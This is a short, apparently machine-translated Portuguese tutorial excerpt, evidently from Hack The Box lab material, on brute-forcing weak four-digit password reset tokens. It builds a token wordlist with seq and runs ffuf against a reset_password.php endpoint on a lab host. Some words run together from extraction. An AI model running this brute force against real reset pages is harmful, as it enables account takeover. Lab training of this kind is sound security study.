Brute-Forcing Password Reset Tokens
Atacando Tokens de Reinicialização Fracos
Precisamos criar uma lista de palavras de todos os tokens possíveis de
0000para9999, o que podemos fazer comseq:
seq -w 0 9999 > tokens.txtSspecificar a lista de palavras
ffufpara aplicar força bruta em todos os tokens de redefinição ativos:
ffuf -w ./tokens.txt -u http://weak_reset.htb/reset_password.php?token=FUZZ -fr "The provided token is invalid"Last updated